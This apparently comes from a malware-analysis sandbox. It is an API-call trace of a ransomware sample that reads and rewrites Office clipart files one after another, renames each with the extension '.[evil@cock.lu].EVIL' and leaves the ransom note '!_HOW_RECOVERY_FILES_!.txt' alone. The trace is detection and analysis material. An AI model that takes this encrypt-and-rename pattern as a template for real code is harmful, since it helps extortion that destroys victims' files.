wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF") returned 0x45 [0169.326] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00610_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.328] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9c80, lpOverlapped=0x0) returned 1 [0169.335] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.335] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.335] _errno () returned 0x84b1160840 [0169.335] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.335] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x9ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9ca0, lpOverlapped=0x0) returned 1 [0169.335] CloseHandle (hObject=0x1a8) returned 1 [0169.336] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.336] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.336] __uncaught_exception () returned 0x84b1160800 [0169.336] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.336] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00610_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00610_.wmf.[evil@cock.lu].evil")) returned 1 [0169.337] ??_V@YAXPEAX@Z () returned 0x1 [0169.340] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF", dwFileAttributes=0x200) returned 0 [0169.340] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.340] wcsstr (_Str="SO00629_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.340] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF") returned 69 [0169.340] wcscmp (_String1="SO00629_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.340] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00629_.WMF") returned 0x0 [0169.340] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF") returned 0x45 [0169.340] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.342] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfe6, lpOverlapped=0x0) returned 1 [0169.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.349] _errno () returned 0x84b1160840 [0169.349] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.349] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1000, lpOverlapped=0x0) returned 1 [0169.349] CloseHandle (hObject=0x1a8) returned 1 [0169.350] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.350] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.350] __uncaught_exception () returned 0x84b1160800 [0169.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.350] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00629_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00629_.wmf.[evil@cock.lu].evil")) returned 1 [0169.351] ??_V@YAXPEAX@Z () returned 0x1 [0169.354] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF", dwFileAttributes=0x200) returned 0 [0169.354] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.354] wcsstr (_Str="SO00633_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.354] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF") returned 69 [0169.354] wcscmp (_String1="SO00633_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.354] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00633_.WMF") returned 0x0 [0169.354] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF") returned 0x45 [0169.354] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00633_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.356] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5006, lpOverlapped=0x0) returned 1 [0169.363] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.363] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.363] _errno () returned 0x84b1160840 [0169.363] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.363] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x5020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5020, lpOverlapped=0x0) returned 1 [0169.363] CloseHandle (hObject=0x1a8) returned 1 [0169.363] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.364] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.364] __uncaught_exception () returned 0x84b1160800 [0169.366] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.366] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00633_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00633_.wmf.[evil@cock.lu].evil")) returned 1 [0169.367] ??_V@YAXPEAX@Z () returned 0x1 [0169.370] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF", dwFileAttributes=0x200) returned 0 [0169.370] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.370] wcsstr (_Str="SO00638_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.370] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF") returned 69 [0169.370] wcscmp (_String1="SO00638_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.370] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00638_.WMF") returned 0x0 [0169.370] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF") returned 0x45 [0169.370] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.372] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1aba, lpOverlapped=0x0) returned 1 [0169.379] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.379] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.379] _errno () returned 0x84b1160840 [0169.379] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.379] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ac0, lpOverlapped=0x0) returned 1 [0169.379] CloseHandle (hObject=0x1a8) returned 1 [0169.379] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.380] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.380] __uncaught_exception () returned 0x84b1160800 [0169.380] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.380] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00638_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00638_.wmf.[evil@cock.lu].evil")) returned 1 [0169.381] ??_V@YAXPEAX@Z () returned 0x1 [0169.385] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF", dwFileAttributes=0x200) returned 0 [0169.385] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.385] wcsstr (_Str="SO00656_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.385] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF") returned 69 [0169.385] wcscmp (_String1="SO00656_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.385] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00656_.WMF") returned 0x0 [0169.385] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF") returned 0x45 [0169.386] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00656_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.388] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x584, lpOverlapped=0x0) returned 1 [0169.462] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.462] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.462] _errno () returned 0x84b1160840 [0169.462] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.462] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5a0, lpOverlapped=0x0) returned 1 [0169.462] CloseHandle (hObject=0x1a8) returned 1 [0169.463] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.463] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.463] __uncaught_exception () returned 0x84b1160800 [0169.463] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.463] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00656_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00656_.wmf.[evil@cock.lu].evil")) returned 1 [0169.465] ??_V@YAXPEAX@Z () returned 0x1 [0169.468] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF", dwFileAttributes=0x200) returned 0 [0169.468] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.469] wcsstr (_Str="SO00668_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.469] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF") returned 69 [0169.469] wcscmp (_String1="SO00668_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.469] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00668_.WMF") returned 0x0 [0169.469] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF") returned 0x45 [0169.469] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00668_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.471] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1652, lpOverlapped=0x0) returned 1 [0169.479] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.479] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.479] _errno () returned 0x84b1160840 [0169.479] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.479] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1660, lpOverlapped=0x0) returned 1 [0169.480] CloseHandle (hObject=0x1a8) returned 1 [0169.480] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.480] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.480] __uncaught_exception () returned 0x84b1160800 [0169.480] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.480] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00668_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00668_.wmf.[evil@cock.lu].evil")) returned 1 [0169.481] ??_V@YAXPEAX@Z () returned 0x1 [0169.485] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF", dwFileAttributes=0x200) returned 0 [0169.485] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.485] wcsstr (_Str="SO00670_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.485] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF") returned 69 [0169.485] wcscmp (_String1="SO00670_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.485] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00670_.WMF") returned 0x0 [0169.485] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF") returned 0x45 [0169.485] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00670_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.487] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16c0, lpOverlapped=0x0) returned 1 [0169.494] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.494] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.494] _errno () returned 0x84b1160840 [0169.494] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.495] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16e0, lpOverlapped=0x0) returned 1 [0169.495] CloseHandle (hObject=0x1a8) returned 1 [0169.495] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.495] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.495] __uncaught_exception () returned 0x84b1160800 [0169.495] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.495] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00670_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00670_.wmf.[evil@cock.lu].evil")) returned 1 [0169.496] ??_V@YAXPEAX@Z () returned 0x1 [0169.499] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF", dwFileAttributes=0x200) returned 0 [0169.499] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.499] wcsstr (_Str="SO00671_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.499] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF") returned 69 [0169.499] wcscmp (_String1="SO00671_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.499] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00671_.WMF") returned 0x0 [0169.499] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF") returned 0x45 [0169.499] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00671_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.502] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5d0, lpOverlapped=0x0) returned 1 [0169.511] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.511] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.511] _errno () returned 0x84b1160840 [0169.511] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.511] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5e0, lpOverlapped=0x0) returned 1 [0169.511] CloseHandle (hObject=0x1a8) returned 1 [0169.511] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.511] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.511] __uncaught_exception () returned 0x84b1160800 [0169.511] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.512] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00671_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00671_.wmf.[evil@cock.lu].evil")) returned 1 [0169.513] ??_V@YAXPEAX@Z () returned 0x1 [0169.516] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF", dwFileAttributes=0x200) returned 0 [0169.517] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.517] wcsstr (_Str="SO00683_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.517] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF") returned 69 [0169.517] wcscmp (_String1="SO00683_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.517] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00683_.WMF") returned 0x0 [0169.517] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF") returned 0x45 [0169.517] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00683_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 